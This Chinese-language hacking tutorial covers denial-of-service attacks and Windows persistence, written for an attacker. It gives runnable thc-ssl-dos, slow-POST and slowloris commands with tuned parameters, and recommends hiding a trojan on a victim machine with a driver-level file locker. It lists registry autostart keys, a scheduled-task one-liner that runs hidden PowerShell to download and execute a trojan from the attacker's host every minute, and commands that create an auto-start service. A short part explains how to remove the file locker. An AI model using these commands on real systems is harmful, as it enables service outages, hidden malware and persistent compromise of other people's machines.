1.14 自启动和DOS攻击初步

DOS拒绝服务攻击

ssl-dos

一般用于打击https网站，如果目标挂了CDN无效

安装：执行sudo apt-get install thc-ssl-dos安装程序

攻击：

1

thc-ssl-dos [目标ip] 443 --accept

慢速攻击

安装程序：

1
2
3


sudo apt-get install openssl
sudo apt-get install libssl-dev
sudo apt-get install slowhttptest

slow http Post攻击（针对接受 POST 请求的接口）

攻击命令：

1

slowhttptest -c 2000 -B -g -o body_states -i 110 -r 200 -s 8192 -t FAKEVERB -u http://[目标ip] -x 10 -p 3

参数解释：

参数	英文全称/含义	具体作用
`-c 2000`	`connections`（并发连接数）	指定向目标服务器同时建立2000个并发HTTP连接，这是攻击的核心资源消耗项，连接数越多，对服务器的资源占用越严重。
`-B`	`Body attack`（慢POST攻击）	明确攻击类型为Slow POST（慢POST攻击）（也叫Body byterange attack），这是慢HTTP攻击的一种，核心是故意缓慢发送POST请求体，长时间占用服务器连接。
`-g`	`generate statistics`（生成统计日志）	启用日志记录功能，会生成CSV格式的原始数据文件和HTML格式的可视化报告，用于记录攻击过程中的连接状态、响应时间、服务器负载等数据。
`-o body_states`	`output prefix`（输出文件前缀）	指定日志文件的前缀为`body_states`，结合`-g`参数，会生成`body_states.csv`（数据文件）和`body_states.html`（可视化报告）两个文件。
`-i 110`	`interval`（数据块发送间隔）	指定每次发送请求体数据块之间的时间间隔为110毫秒（ms）。间隔越长，服务器的连接被占用的时间越久，攻击效果越显著。
`-r 200`	`rate`（每秒新建连接数）	指定每秒向目标新建200个连接，直到达到`-c 2000`的并发连接上限（约10秒可达到2000个并发）。
`-s 8192`	`content length size`（内容长度）	在HTTP请求头的`Content-Length`字段中声明预期发送8192字节（8KB）的请求体，欺骗服务器保持连接等待接收完整数据。
`-t FAKEVERB`	`HTTP verb`（HTTP方法）	指定HTTP请求使用伪造的非标准方法`FAKEVERB`（正常HTTP方法为GET/POST/PUT等）。此举可尝试绕过部分服务器的防护规则，也用于测试服务器对非标准方法的兼容性。
`-u http://[目标ip]`	`URL`（目标地址）	指定攻击目标的URL，需将`[目标ip]`替换为实际的服务器IP或域名。
`-x 10`	`block size`（数据块长度）	指定每次向服务器发送的请求体数据块长度为10字节。即每次只发10字节，等待110毫秒后再发下一个10字节，故意拖延请求体的传输速度。
`-p 3`	`probe timeout`（探测超时时间）	在发起正式攻击前，工具会先发送一个探测请求检查目标是否可达，若3秒内无响应则判定目标不可达，停止攻击。

原理解析： 发送 POST 请求时，在请求头中声明Content-Length: 8192（要发 8KB 数据），然后以 10 字节 / 110ms 的极慢速度发送请求体，让服务器一直等待接收完整的请求体，从而长期占用连接资源。

slowloris攻击（针对所有接受 GET 请求的页面，基本通用）

攻击命令：

1

slowhttptest -c 2000 -H -g -o my_header_states -i 10 -r 1000 -s 8192 -t GET -u http://[目标ip] -x 24 -p 3

原理解析： 发送 GET 请求时，故意 逐个缓慢发送 HTTP 请求头字段 （如Host:、User-Agent:、Accept:等），每个字段大小为 24 字节，发送间隔仅 10ms（看似快，但对服务器的连接处理机制而言，仍足够慢以占用连接），且不发送请求头的结束标记（\r\n\r\n），让服务器认为请求头还在传输中，从而一直保持连接等待完整的请求头。

其他内容

驱动级文件保护软件

使用 **Easy File Locker ** 可以对我们的文件进行驱动级的保护和隐藏，当然包括我们放在目标上的木马程序。

当配置完毕（或我们自己中招）后，我们可以检查下面两个文件夹看看是否真的生效了

C:/Windows/xlfks.xxx(包括但不限于dat、dll、ini、log……)

C:/Windows/system32/drivers/xlkfs.sys

如果检查出上面两个文件就说明是驱动级的文件隐藏

如何清除：

查询服务状态sc qc xlkfs
停止服务net stop xlkfs
删除服务sc delete xlkfs
找到上面的两位个文件残余并删除
删除木马程序

注册表自启动

Win+R输入regedit回车打开注册表

路径一：

找到路径为HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

路径二：

找到路径为HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

路径三：

找到路径为HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

路径四：

找到路径为HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

路径五：

找到路径为HKEY_CURRENT_USER\Environment

**说明：**路径三、四、五内的条目都是Windows在登录时会执行的任务

右键新建字符串值，在数据中输入要自启动的文件路径和启动参数

计划任务启动

1
2
3


schtasks /create /sc minute /mo 1 /tn "示例名称" /tr "powershell.exe -nop -w hidden
-c \"IEX((new-object net.webclient).DownloadString(\"\"\"http://[攻击机ip]/
[木马文件]"\"\"\"))\""

上面的代码会让目标每分钟在后台下载并执行攻击者的木马程序

服务启动

增加一个服务

sc create "示例名称" binpath= "cmd /c start 具体命令"

设置服务描述

sc description 示例名称 "示例描述"

设置自动启动

sc config 示例名称 start= auto

开启服务

net start 示例名称